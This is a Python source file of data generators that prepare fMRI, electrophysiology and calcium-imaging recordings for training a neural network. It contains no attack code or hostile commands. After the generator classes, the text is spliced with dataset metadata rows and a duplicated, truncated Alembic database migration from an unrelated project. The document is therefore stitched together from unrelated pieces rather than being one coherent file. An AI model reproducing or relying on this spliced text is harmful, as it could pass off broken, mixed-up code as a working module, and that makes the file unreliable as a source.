        data_img_input = np.swapaxes(data_img_input, 0, 2)

        img_in_shape = data_img_input.shape
        img_out_shape = data_img_output.shape

        data_img_input = (
            data_img_input.astype("float") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float") - self.local_mean
        ) / self.local_std

        input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
        output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output

        return input_full, output_full
class CollectorGenerator(DeepGenerator):
    "This class allows to create a generator of generators for the purpose of training across multiple files"
    "All generators must have idendical batch size and input, output size but can be different length"

    def __init__(self, generator_list):
        # NOTE(review): super().__init__ is not called -- there is no json
        # file for this wrapper; the wrapped generators carry all settings.
        self.generator_list = generator_list
        self.nb_generator = len(self.generator_list)
        self.batch_size = self.generator_list[0].batch_size
        self.assign_indexes()
        self.shuffle_indexes()

    def __len__(self):
        "Denotes the total number of batches"
        # Total batch count is the sum over all wrapped generators.
        total_len = 0
        for local_generator in self.generator_list:
            total_len = total_len + local_generator.__len__()
        return total_len

    def assign_indexes(self):
        # Build a flat list mapping each global batch index to a
        # (wrapped generator, local batch index) pair.
        self.list_samples = []
        current_count = 0
        for generator_index, local_generator in enumerate(self.generator_list):
            local_len = local_generator.__len__()
            for index in np.arange(0, local_len):
                self.list_samples.append({"generator": generator_index, "index": index})
                current_count = current_count + 1

    def shuffle_indexes(self):
        # Interleave batches from the different files during training.
        np.random.shuffle(self.list_samples)

    def __getitem__(self, index):
        # Generate indexes of the batch
        # Delegate to the wrapped generator that owns this global index.
        local_index = self.list_samples[index]
        local_generator = self.generator_list[local_index["generator"]]
        local_generator_index = local_index["index"]

        input_full, output_full = local_generator.__getitem__(local_generator_index)

        return input_full, output_full
class FmriGenerator(DeepGenerator):
    # Generator for 4D fMRI volumes: each sample is a small (x, y, z, t)
    # neighborhood used to predict its center voxel.
    def __init__(self, json_path):
        super().__init__(json_path)

        self.raw_data_file = self.json_data["train_path"]
        self.batch_size = self.json_data["batch_size"]
        self.pre_post_x = self.json_data["pre_post_x"]
        self.pre_post_y = self.json_data["pre_post_y"]
        self.pre_post_z = self.json_data["pre_post_z"]
        self.pre_post_t = self.json_data["pre_post_t"]
        self.start_frame = self.json_data["start_frame"]
        self.end_frame = self.json_data["end_frame"]
        self.total_nb_block = self.json_data["total_nb_block"]
        self.steps_per_epoch = self.json_data["steps_per_epoch"]

        # Size of the central region blanked from the input (1 = just the
        # center voxel).
        if "center_omission_size" in self.json_data.keys():
            self.center_omission_size = self.json_data["center_omission_size"]
        else:
            self.center_omission_size = 1

        # True: predict only the center voxel; False: predict the whole
        # central (x, y, z) slab at the center time point.
        if "single_voxel_output_single" in self.json_data.keys():
            self.single_voxel_output_single = self.json_data[
                "single_voxel_output_single"
            ]
        else:
            self.single_voxel_output_single = True

        if "initialize_list" in self.json_data.keys():
            self.initialize_list = self.json_data["initialize_list"]
        else:
            self.initialize_list = 1

        # We load the entire data as it fits into memory
        self.raw_data = nib.load(self.raw_data_file).get_fdata()

        self.data_shape = self.raw_data.shape

        middle_vol = np.round(np.array(self.data_shape) / 2).astype("int")
        range_middle = np.round(np.array(self.data_shape) / 4).astype("int")

        # We take the middle of the volume and time for range estimation to avoid edge effects
        local_center_data = self.raw_data[
            middle_vol[0] - range_middle[0] : middle_vol[0] + range_middle[0],
            middle_vol[1] - range_middle[1] : middle_vol[1] + range_middle[1],
            middle_vol[2] - range_middle[2] : middle_vol[2] + range_middle[2],
            middle_vol[3] - range_middle[3] : middle_vol[3] + range_middle[3],
        ]

        self.local_mean = np.mean(local_center_data.flatten())
        self.local_std = np.std(local_center_data.flatten())

        self.epoch_index = 0

        if self.initialize_list == 1:
            # Draw total_nb_block distinct random (x, y, z, t) sample centers;
            # filling_array marks already-drawn centers to avoid duplicates.
            self.x_list = []
            self.y_list = []
            self.z_list = []
            self.t_list = []
            filling_array = np.zeros(self.data_shape, dtype=bool)

            for index, value in enumerate(range(self.total_nb_block)):
                retake = True
                print(index)
                while retake:
                    x_local, y_local, z_local, t_local = self.get_random_xyzt()
                    retake = False
                    if filling_array[x_local, y_local, z_local, t_local]:
                        retake = True

                filling_array[x_local, y_local, z_local, t_local] = True
                self.x_list.append(x_local)
                self.y_list.append(y_local)
                self.z_list.append(z_local)
                self.t_list.append(t_local)

    def get_random_xyzt(self):
        # Uniform random spatial voxel; time limited to [start_frame, end_frame).
        x_center = np.random.randint(0, self.data_shape[0])
        y_center = np.random.randint(0, self.data_shape[1])
        z_center = np.random.randint(0, self.data_shape[2])
        t_center = np.random.randint(self.start_frame, self.end_frame)

        return x_center, y_center, z_center, t_center

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.x_list) / self.batch_size)))

    def on_epoch_end(self):
        # Advance the window of samples used per epoch when steps_per_epoch
        # covers only part of the full list.
        if self.steps_per_epoch * (self.epoch_index + 2) < self.__len__():
            self.epoch_index = self.epoch_index + 1
        else:
            # if we reach the end of the data, we roll over
            self.epoch_index = 0

    def __getitem__(self, index):
        # This is to ensure we are going through the entire data when steps_per_epoch<self.__len__
        index = index + self.steps_per_epoch * self.epoch_index

        # Generate indexes of the batch
        indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)

        input_full = np.zeros(
            [
                self.batch_size,
                self.pre_post_x * 2 + 1,
                self.pre_post_y * 2 + 1,
                self.pre_post_z * 2 + 1,
                self.pre_post_t * 2 + 1,
            ],
            dtype="float32",
        )

        if self.single_voxel_output_single:
            output_full = np.zeros([self.batch_size, 1, 1, 1, 1], dtype="float32")
        else:
            output_full = np.zeros(
                [
                    self.batch_size,
                    self.pre_post_x * 2 + 1,
                    self.pre_post_y * 2 + 1,
                    self.pre_post_z * 2 + 1,
                    1,
                ],
                dtype="float32",
            )

        for batch_index, sample_index in enumerate(indexes):
            local_x = self.x_list[sample_index]
            local_y = self.y_list[sample_index]
            local_z = self.z_list[sample_index]
            local_t = self.t_list[sample_index]

            input, output = self.__data_generation__(local_x, local_y, local_z, local_t)

            input_full[batch_index, :, :, :, :] = input
            output_full[batch_index, :, :, :, :] = output

        return input_full, output_full

    def __data_generation__(self, local_x, local_y, local_z, local_t):
        "Generates data containing batch_size samples"

        input_full = np.zeros(
            [
                1,
                self.pre_post_x * 2 + 1,
                self.pre_post_y * 2 + 1,
                self.pre_post_z * 2 + 1,
                self.pre_post_t * 2 + 1,
            ],
            dtype="float32",
        )

        if self.single_voxel_output_single:
            output_full = np.zeros([1, 1, 1, 1, 1], dtype="float32")
        else:
            output_full = np.zeros(
                [
                    1,
                    self.pre_post_x * 2 + 1,
                    self.pre_post_y * 2 + 1,
                    self.pre_post_z * 2 + 1,
                    1,
                ],
                dtype="float32",
            )

        # We cap the x axis when touching the limit of the volume
        if local_x - self.pre_post_x < 0:
            pre_x = local_x
        else:
            pre_x = self.pre_post_x

        if local_x + self.pre_post_x > self.data_shape[0] - 1:
            post_x = self.data_shape[0] - 1 - local_x
        else:
            post_x = self.pre_post_x

        # We cap the y axis when touching the limit of the volume
        if local_y - self.pre_post_y < 0:
            pre_y = local_y
        else:
            pre_y = self.pre_post_y

        if local_y + self.pre_post_y > self.data_shape[1] - 1:
            post_y = self.data_shape[1] - 1 - local_y
        else:
            post_y = self.pre_post_y

        # We cap the z axis when touching the limit of the volume
        if local_z - self.pre_post_z < 0:
            pre_z = local_z
        else:
            pre_z = self.pre_post_z

        if local_z + self.pre_post_z > self.data_shape[2] - 1:
            post_z = self.data_shape[2] - 1 - local_z
        else:
            post_z = self.pre_post_z

        # We cap the t axis when touching the limit of the volume
        if local_t - self.pre_post_t < 0:
            pre_t = local_t
        else:
            pre_t = self.pre_post_t

        if local_t + self.pre_post_t > self.data_shape[3] - 1:
            post_t = self.data_shape[3] - 1 - local_t
        else:
            post_t = self.pre_post_t

        # Copy the (possibly clipped) neighborhood into the center of the
        # fixed-size input block; out-of-volume voxels stay zero.
        input_full[
            0,
            (self.pre_post_x - pre_x) : (self.pre_post_x + post_x + 1),
            (self.pre_post_y - pre_y) : (self.pre_post_y + post_y + 1),
            (self.pre_post_z - pre_z) : (self.pre_post_z + post_z + 1),
            (self.pre_post_t - pre_t) : (self.pre_post_t + post_t + 1),
        ] = self.raw_data[
            (local_x - pre_x) : (local_x + post_x + 1),
            (local_y - pre_y) : (local_y + post_y + 1),
            (local_z - pre_z) : (local_z + post_z + 1),
            (local_t - pre_t) : (local_t + post_t + 1),
        ]

        if self.single_voxel_output_single:
            output_full[0, 0, 0, 0, 0] = input_full[
                0, self.pre_post_x, self.pre_post_y, self.pre_post_z, self.pre_post_t
            ]
        else:
            output_full[0, :, :, :, 0] = input_full[0, :, :, :, self.pre_post_t]

        # input_full[0, self.pre_post_x, self.pre_post_y, self.pre_post_z, self.pre_post_t] = 0
        # Blank the center voxel (and optionally a larger central hole) so
        # the network cannot copy the value it must predict.
        input_full[
            0, self.pre_post_x, self.pre_post_y, self.pre_post_z, self.pre_post_t
        ] = 0

        if self.center_omission_size > 1:
            local_hole = self.center_omission_size - 1

            input_full[
                0,
                (self.pre_post_x - local_hole) : (self.pre_post_x + local_hole),
                (self.pre_post_y - local_hole) : (self.pre_post_y + local_hole),
                (self.pre_post_z - local_hole) : (self.pre_post_z + local_hole),
                self.pre_post_t,
            ] = 0

        input_full = (input_full.astype("float32") - self.local_mean) / self.local_std
        output_full = (output_full.astype("float32") - self.local_mean) / self.local_std

        return input_full, output_full
class EphysGenerator(DeepGenerator):
    """Generates Keras batches from an electrophysiology probe recording.

    The raw int16 binary file is memory mapped and reshaped to the probe
    layout (frames x nb_probes/2 x 2 columns). Each sample pairs one frame
    (output) with the surrounding ``pre_post_frame`` frames on each side
    (input), skipping ``pre_post_omission`` frames around the center.
    """

    def __init__(self, json_path):
        """Initialize the generator from the JSON parameter file at *json_path*.

        The JSON is expected to provide train_path, batch_size,
        pre_post_frame, pre_post_omission, start_frame, end_frame,
        steps_per_epoch, nb_probes and optionally randomize.
        """
        super().__init__(json_path)
        self.raw_data_file = self.json_data["train_path"]
        self.batch_size = self.json_data["batch_size"]
        self.pre_post_frame = self.json_data["pre_post_frame"]
        self.pre_post_omission = self.json_data["pre_post_omission"]
        self.start_frame = self.json_data["start_frame"]
        self.steps_per_epoch = self.json_data["steps_per_epoch"]
        # This is compatible with negative frames
        self.end_frame = self.json_data["end_frame"]
        self.nb_probes = self.json_data["nb_probes"]  # modified by sk 2020/11/20
        # First map the file flat, only to derive the total frame count.
        self.raw_data = np.memmap(self.raw_data_file, dtype="int16")
        if self.end_frame < 0:
            # Negative end_frame counts back from the end of the recording.
            self.img_per_movie = (
                int(self.raw_data.size / self.nb_probes)
                + 1
                + self.end_frame
                - self.start_frame
                - self.pre_post_frame
                - self.pre_post_omission
            )
        elif int(self.raw_data.size / self.nb_probes) < self.end_frame:
            # Requested end frame exceeds the recording; clamp to what exists.
            self.img_per_movie = (
                int(self.raw_data.size / self.nb_probes)
                - self.start_frame
                - self.pre_post_frame
                - self.pre_post_omission
            )
        else:
            self.img_per_movie = self.end_frame + 1 - self.start_frame
        self.total_frame_per_movie = int(self.raw_data.size / self.nb_probes)
        average_nb_samples = 200000
        shape = (self.total_frame_per_movie, int(self.nb_probes / 2), 2)
        # Re-map the file with the probe-geometry shape.
        self.raw_data = np.memmap(self.raw_data_file, dtype="int16", shape=shape)
        # Normalization statistics estimated from the first samples only.
        local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
        local_data = local_data.astype("float32")
        self.local_mean = np.mean(local_data)
        self.local_std = np.std(local_data)
        self.epoch_index = 0
        self.list_samples = np.arange(
            self.start_frame, self.start_frame + self.img_per_movie
        )
        if "randomize" in self.json_data.keys():
            if self.json_data["randomize"] == 1:
                np.random.shuffle(self.list_samples)

    def __len__(self):
        """Return the total number of full batches available."""
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def on_epoch_end(self):
        """Advance the epoch counter so __getitem__ keeps walking new samples
        when steps_per_epoch is smaller than __len__()."""
        self.epoch_index = self.epoch_index + 1

    def __getitem__(self, index):
        """Assemble batch *index* as (input, output) float32 arrays."""
        # Offset by past epochs so successive epochs cover new samples when
        # steps_per_epoch < self.__len__().
        index = index + self.steps_per_epoch * self.epoch_index
        # Generate indexes of the batch
        if (index + 1) * self.batch_size > self.total_frame_per_movie:
            indexes = np.arange(index * self.batch_size, self.img_per_movie)
        else:
            indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)
        shuffle_indexes = self.list_samples[indexes]
        input_full = np.zeros(
            [self.batch_size, int(self.nb_probes), 2, self.pre_post_frame * 2],
            dtype="float32",
        )
        output_full = np.zeros(
            [self.batch_size, int(self.nb_probes), 2, 1], dtype="float32"
        )
        for batch_index, frame_index in enumerate(shuffle_indexes):
            X, Y = self.__data_generation__(frame_index)
            input_full[batch_index, :, :, :] = X
            output_full[batch_index, :, :, :] = Y
        return input_full, output_full

    def __data_generation__(self, index_frame):
        """Build a single (input, output) sample centered on *index_frame*."""
        # We reorganize to follow true geometry of probe for convolution
        input_full = np.zeros(
            [1, self.nb_probes, 2, self.pre_post_frame * 2], dtype="float32"
        )
        output_full = np.zeros([1, self.nb_probes, 2, 1], dtype="float32")
        # Frames around the center, excluding the center itself and an
        # omission window of pre_post_omission frames on each side.
        input_index = np.arange(
            index_frame - self.pre_post_frame - self.pre_post_omission,
            index_frame + self.pre_post_frame + self.pre_post_omission + 1,
        )
        input_index = input_index[input_index != index_frame]
        for index_padding in np.arange(self.pre_post_omission + 1):
            input_index = input_index[input_index != index_frame - index_padding]
            input_index = input_index[input_index != index_frame + index_padding]
        data_img_input = self.raw_data[input_index, :, :]
        data_img_output = self.raw_data[index_frame, :, :]
        # Move the frame axis last: (probes/2, 2, frames).
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)
        data_img_input = (
            data_img_input.astype("float32") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float32") - self.local_mean
        ) / self.local_std
        # alternating filling with zeros padding
        even = np.arange(0, self.nb_probes, 2)
        odd = even + 1
        input_full[0, even, 0, :] = data_img_input[:, 0, :]
        input_full[0, odd, 1, :] = data_img_input[:, 1, :]
        output_full[0, even, 0, 0] = data_img_output[:, 0]
        output_full[0, odd, 1, 0] = data_img_output[:, 1]
        return input_full, output_full
class SingleTifGenerator(DeepGenerator):
    """Generates Keras training batches from a single multi-frame TIFF movie.

    Each sample pairs one center frame (the output) with the surrounding
    ``pre_post_frame`` frames on each side (the input), skipping
    ``pre_post_omission`` frames immediately around the center.
    """
    def __init__(self, json_path):
        """Load the whole TIFF into memory and precompute the sampling order
        and normalization statistics from the JSON parameter file."""
        super().__init__(json_path)
        self.raw_data_file = self.json_data["train_path"]
        self.batch_size = self.json_data["batch_size"]
        self.pre_post_frame = self.json_data["pre_post_frame"]
        self.pre_post_omission = self.json_data["pre_post_omission"]
        self.start_frame = self.json_data["start_frame"]
        # Samples are shuffled by default unless the JSON disables it.
        if "randomize" in self.json_data.keys():
            self.randomize = self.json_data["randomize"]
        else:
            self.randomize = 1
        # This is compatible with negative frames
        self.end_frame = self.json_data["end_frame"]
        with tifffile.TiffFile(self.raw_data_file) as tif:
            self.raw_data = tif.asarray()
        self.total_frame_per_movie = self.raw_data.shape[0]
        # Negative end_frame counts back from the end of the movie.
        if self.end_frame < 0:
            self.img_per_movie = (
                self.total_frame_per_movie + 1 + self.end_frame - self.start_frame
            )
        elif self.total_frame_per_movie < self.end_frame:
            self.img_per_movie = self.total_frame_per_movie + 1 - self.start_frame
        else:
            self.img_per_movie = self.end_frame + 1 - self.start_frame
        # Mean/std for normalization, estimated from the first frames only.
        average_nb_samples = 1000
        local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
        local_data = local_data.astype("float32")
        self.local_mean = np.mean(local_data)
        self.local_std = np.std(local_data)
        # Candidate center frames, kept far enough from both movie edges
        # that the full pre/post window always exists.
        self.list_samples = np.arange(
            self.pre_post_frame + self.pre_post_omission + self.start_frame,
            self.start_frame
            + self.img_per_movie
            - self.pre_post_frame
            - self.pre_post_omission,
        )
        if self.randomize:
            np.random.shuffle(self.list_samples)
    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))
    def __getitem__(self, index):
        """Assemble batch *index* as (input, output) float32 arrays."""
        # Generate indexes of the batch
        if (index + 1) * self.batch_size > self.total_frame_per_movie:
            indexes = np.arange(index * self.batch_size, self.img_per_movie)
        else:
            indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)
        shuffle_indexes = self.list_samples[indexes]
        input_full = np.zeros(
            [
                self.batch_size,
                self.raw_data.shape[1],
                self.raw_data.shape[2],
                self.pre_post_frame * 2,
            ],
            dtype="float32",
        )
        output_full = np.zeros(
            [self.batch_size, self.raw_data.shape[1], self.raw_data.shape[2], 1],
            dtype="float32",
        )
        for batch_index, frame_index in enumerate(shuffle_indexes):
            X, Y = self.__data_generation__(frame_index)
            input_full[batch_index, :, :, :] = X
            output_full[batch_index, :, :, :] = Y
        return input_full, output_full
    def __data_generation__(self, index_frame):
        # X : (n_samples, *dim, n_channels)
        "Generates data containing batch_size samples"
        input_full = np.zeros(
            [
                1,
                self.raw_data.shape[1],
                self.raw_data.shape[2],
                self.pre_post_frame * 2,
            ],
            dtype="float32",
        )
        output_full = np.zeros(
            [1, self.raw_data.shape[1], self.raw_data.shape[2], 1], dtype="float32"
        )
        # Frames around the center, excluding the center itself and an
        # omission window of pre_post_omission frames on each side.
        input_index = np.arange(
            index_frame - self.pre_post_frame - self.pre_post_omission,
            index_frame + self.pre_post_frame + self.pre_post_omission + 1,
        )
        input_index = input_index[input_index != index_frame]
        for index_padding in np.arange(self.pre_post_omission + 1):
            input_index = input_index[input_index != index_frame - index_padding]
            input_index = input_index[input_index != index_frame + index_padding]
        data_img_input = self.raw_data[input_index, :, :]
        data_img_output = self.raw_data[index_frame, :, :]
        # Move the frame axis last via two swaps: (frames, H, W) -> (H, W, frames).
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)
        img_in_shape = data_img_input.shape
        img_out_shape = data_img_output.shape
        data_img_input = (
            data_img_input.astype("float32") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float32") - self.local_mean
        ) / self.local_std
        input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
        output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
        return input_full, output_full
class OphysGenerator(DeepGenerator):
    """Generates Keras batches of 512x512 frames from an HDF5 ophys movie.

    Each sample pairs one frame (output) with the ``pre_frame`` frames
    before it and the ``post_frame`` frames after it (input). The movie
    can live on local disk or on S3 (``from_s3`` flag in the JSON).
    """

    def __init__(self, json_path):
        """Initialize the generator from the JSON parameter file at *json_path*."""
        super().__init__(json_path)
        if "from_s3" in self.json_data.keys():
            self.from_s3 = self.json_data["from_s3"]
        else:
            self.from_s3 = False
        self.raw_data_file = self.json_data["movie_path"]
        self.batch_size = self.json_data["batch_size"]
        self.pre_frame = self.json_data["pre_frame"]
        self.post_frame = self.json_data["post_frame"]
        self.start_frame = self.json_data["start_frame"]
        # This is compatible with negative frames
        self.end_frame = self.json_data["end_frame"]
        # This is used to limit the total number of samples
        # -1 means to take all and is the default fall back
        if "total_samples" in self.json_data.keys():
            self.total_samples = self.json_data["total_samples"]
        else:
            self.total_samples = -1
        # Open the movie only to read its length and estimate normalization
        # statistics; close the handle afterwards (the previous version
        # leaked it for the generator's lifetime).
        if self.from_s3:
            s3_filesystem = s3fs.S3FileSystem()
            movie_obj = h5py.File(s3_filesystem.open(self.raw_data_file, 'rb'), 'r')
        else:
            movie_obj = h5py.File(self.raw_data_file, "r")
        raw_data = movie_obj["data"]
        self.total_frame_per_movie = int(raw_data.shape[0])
        if self.end_frame < 0:
            # Negative end_frame counts back from the end of the movie.
            self.img_per_movie = (
                self.total_frame_per_movie
                + 1
                + self.end_frame
                - self.start_frame
                - self.post_frame
            )
        elif self.total_frame_per_movie < self.end_frame:
            # Requested end frame exceeds the movie; clamp to what exists.
            self.img_per_movie = (
                self.total_frame_per_movie - self.start_frame - self.post_frame
            )
        else:
            self.img_per_movie = self.end_frame + 1 - self.start_frame
        # Mean/std for normalization, estimated from the first frames only.
        average_nb_samples = 1000
        local_data = raw_data[0:average_nb_samples, :, :].flatten()
        local_data = local_data.astype("float32")
        self.local_mean = np.mean(local_data)
        self.local_std = np.std(local_data)
        movie_obj.close()
        self.list_samples = np.arange(
            self.start_frame, self.start_frame + self.img_per_movie
        )
        if "randomize" in self.json_data.keys():
            self.randomize = self.json_data["randomize"]
        else:
            self.randomize = 1
        if self.randomize:
            np.random.shuffle(self.list_samples)
        # We cut the number of samples if asked to
        if self.total_samples > 0 and self.total_samples < len(self.list_samples):
            self.list_samples = self.list_samples[0:self.total_samples]

    def __len__(self):
        """Return the total number of full batches available."""
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def __getitem__(self, index):
        """Assemble batch *index* as (input, output) float32 arrays."""
        # Generate indexes of the batch
        if (index + 1) * self.batch_size > self.total_frame_per_movie:
            indexes = np.arange(index * self.batch_size, self.img_per_movie)
        else:
            indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)
        shuffle_indexes = self.list_samples[indexes]
        input_full = np.zeros(
            [self.batch_size, 512, 512, self.pre_frame + self.post_frame],
            dtype="float32",
        )
        output_full = np.zeros([self.batch_size, 512, 512, 1], dtype="float32")
        for batch_index, frame_index in enumerate(shuffle_indexes):
            X, Y = self.__data_generation__(frame_index)
            input_full[batch_index, :, :, :] = X
            output_full[batch_index, :, :, :] = Y
        return input_full, output_full

    def __data_generation__(self, index_frame):
        """Build a single (input, output) sample centered on *index_frame*.

        The HDF5 movie is reopened on every call and closed before
        returning.
        """
        if self.from_s3:
            s3_filesystem = s3fs.S3FileSystem()
            movie_obj = h5py.File(s3_filesystem.open(self.raw_data_file, 'rb'), 'r')
        else:
            movie_obj = h5py.File(self.raw_data_file, "r")
        input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
        output_full = np.zeros([1, 512, 512, 1])
        # Frames around the center, excluding the center frame itself.
        input_index = np.arange(
            index_frame - self.pre_frame, index_frame + self.post_frame + 1,
        )
        input_index = input_index[input_index != index_frame]
        data_img_input = movie_obj["data"][input_index, :, :]
        data_img_output = movie_obj["data"][index_frame, :, :]
        # Move the frame axis last via two swaps: (frames, H, W) -> (H, W, frames).
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)
        img_in_shape = data_img_input.shape
        img_out_shape = data_img_output.shape
        data_img_input = (
            data_img_input.astype("float") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float") - self.local_mean
        ) / self.local_std
        input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
        output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
        movie_obj.close()
        return input_full, output_full
class MovieJSONGenerator(DeepGenerator):
    """Generates Keras batches of 512x512 frames from several movies listed
    in a JSON manifest.

    The manifest maps each lims id to a movie path, a list of output frame
    indices and per-movie mean/std used for normalization. Samples are
    interleaved across lims ids.
    """

    def __init__(self, json_path):
        """Initialize the generator from the JSON parameter file at *json_path*."""
        super().__init__(json_path)
        self.sample_data_path_json = self.json_data["train_path"]
        self.batch_size = self.json_data["batch_size"]
        self.steps_per_epoch = self.json_data["steps_per_epoch"]
        self.epoch_index = 0
        # The following is to be backward compatible
        if "pre_frame" in self.json_data.keys():
            self.pre_frame = self.json_data["pre_frame"]
        else:
            self.pre_frame = self.json_data["pre_post_frame"]
        if "post_frame" in self.json_data.keys():
            self.post_frame = self.json_data["post_frame"]
        else:
            self.post_frame = self.json_data["pre_post_frame"]
        with open(self.sample_data_path_json, "r") as json_handle:
            self.frame_data_location = json.load(json_handle)
        self.lims_id = list(self.frame_data_location.keys())
        self.nb_lims = len(self.lims_id)
        # Assumes every lims entry lists as many frames as the first one
        # -- TODO confirm against the manifest producer.
        self.img_per_movie = len(self.frame_data_location[self.lims_id[0]]["frames"])

    def __len__(self):
        """Return the total number of batches (the last may be partial)."""
        return int(np.ceil(float(self.nb_lims * self.img_per_movie) / self.batch_size))

    def on_epoch_end(self):
        """Advance the epoch counter so __getitem__ keeps walking new samples
        when steps_per_epoch is smaller than __len__()."""
        self.epoch_index = self.epoch_index + 1

    def __getitem__(self, index):
        """Assemble batch *index* as (input, output) arrays."""
        # Offset by past epochs so successive epochs cover new samples when
        # steps_per_epoch < self.__len__().
        index = index + self.steps_per_epoch * self.epoch_index
        # Generate indexes of the batch
        if (index + 1) * self.batch_size > self.nb_lims * self.img_per_movie:
            indexes = np.arange(
                index * self.batch_size, self.nb_lims * self.img_per_movie
            )
        else:
            indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)
        input_full = np.zeros(
            [self.batch_size, 512, 512, self.pre_frame + self.post_frame]
        )
        output_full = np.zeros([self.batch_size, 512, 512, 1])
        for batch_index, frame_index in enumerate(indexes):
            X, Y = self.__data_generation__(frame_index)
            input_full[batch_index, :, :, :] = X
            output_full[batch_index, :, :, :] = Y
        return input_full, output_full

    def get_lims_id_sample_from_index(self, index):
        """Map a flat sample *index* to (lims_id, frame position); samples
        are interleaved across lims ids."""
        local_img = int(np.floor(index / self.nb_lims))
        local_lims_index = int(index - self.nb_lims * local_img)
        local_lims = self.lims_id[local_lims_index]
        return local_lims, local_img

    def __get_norm_parameters__(self, index_frame):
        """Return the (mean, std) stored in the manifest for the movie that
        owns flat sample *index_frame*."""
        local_lims, local_img = self.get_lims_id_sample_from_index(index_frame)
        local_mean = self.frame_data_location[local_lims]["mean"]
        local_std = self.frame_data_location[local_lims]["std"]
        return local_mean, local_std

    def __data_generation__(self, index_frame):
        """Build a single (input, output) sample for flat sample *index_frame*.

        On failure, logs the problem and implicitly returns None (the
        caller will then fail when unpacking) -- behavior kept from the
        original.
        """
        try:
            local_lims, local_img = self.get_lims_id_sample_from_index(index_frame)
            # Initialization
            local_path = self.frame_data_location[local_lims]["path"]
            _filenames = ["motion_corrected_video.h5", "concat_31Hz_0.h5"]
            motion_path = []
            for _filename in _filenames:
                _filepath = os.path.join(local_path, "processed", _filename)
                if os.path.exists(_filepath) and not os.path.islink(
                    _filepath
                ):  # Path exists and is not symbolic
                    motion_path = _filepath
                    break
            movie_obj = h5py.File(motion_path, "r")
            output_frame = self.frame_data_location[local_lims]["frames"][local_img]
            local_mean = self.frame_data_location[local_lims]["mean"]
            local_std = self.frame_data_location[local_lims]["std"]
            input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
            output_full = np.zeros([1, 512, 512, 1])
            # Frames around the center, excluding the center frame itself.
            input_index = np.arange(
                output_frame - self.pre_frame, output_frame + self.post_frame + 1,
            )
            input_index = input_index[input_index != output_frame]
            data_img_input = movie_obj["data"][input_index, :, :]
            data_img_output = movie_obj["data"][output_frame, :, :]
            data_img_input = np.swapaxes(data_img_input, 1, 2)
            data_img_input = np.swapaxes(data_img_input, 0, 2)
            img_in_shape = data_img_input.shape
            img_out_shape = data_img_output.shape
            data_img_input = (data_img_input.astype("float") - local_mean) / local_std
            data_img_output = (data_img_output.astype("float") - local_mean) / local_std
            input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
            output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
            movie_obj.close()
            return input_full, output_full
        except Exception:
            # Bug fix: the original handler referenced an undefined name
            # (output_frame_index) and itself raised a NameError; it was
            # also a bare except that caught SystemExit/KeyboardInterrupt.
            print("Issues with " + str(self.lims_id) + " at " + str(index_frame))
| 13,167 | 4,331 | 505 |
31d15073f4299bffb88f36168fb8ffcab78c52c8 | 1,228 | py | Python | migrations/versions/b652b688d0ed_.py | firmitfeng/SurveysFlask | d25cdd68261088cfdf9596b291f70a1b0c32fd25 | [
"MIT"
] | null | null | null | migrations/versions/b652b688d0ed_.py | firmitfeng/SurveysFlask | d25cdd68261088cfdf9596b291f70a1b0c32fd25 | [
"MIT"
] | null | null | null | migrations/versions/b652b688d0ed_.py | firmitfeng/SurveysFlask | d25cdd68261088cfdf9596b291f70a1b0c32fd25 | [
"MIT"
] | null | null | null | """empty message
Revision ID: b652b688d0ed
Revises: c6170594b21e
Create Date: 2017-06-22 12:43:46.146126
"""
# revision identifiers, used by Alembic.
revision = 'b652b688d0ed'
down_revision = 'c6170594b21e'
from alembic import op
import sqlalchemy as sa
| 30.7 | 80 | 0.673453 | """empty message
Revision ID: b652b688d0ed
Revises: c6170594b21e
Create Date: 2017-06-22 12:43:46.146126
"""
# revision identifiers, used by Alembic.
revision = 'b652b688d0ed'
down_revision = 'c6170594b21e'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Apply this revision: create the ``archives`` table (with foreign keys
    to ``users`` for author and object) and add ``messages.ctime``."""
    ### commands auto generated by Alembic - please adjust! ###
    op.create_table('archives',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('content', sa.Text(), nullable=True),
    sa.Column('keywords', sa.String(length=200), nullable=True),
    sa.Column('type', sa.String(length=64), nullable=True),
    sa.Column('ctime', sa.DateTime(), nullable=True),
    sa.Column('author_id', sa.Integer(), nullable=True),
    sa.Column('object_id', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),
    sa.ForeignKeyConstraint(['object_id'], ['users.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.add_column(u'messages', sa.Column('ctime', sa.DateTime(), nullable=True))
    ### end Alembic commands ###
def downgrade():
    """Revert this revision: drop ``messages.ctime`` and the ``archives``
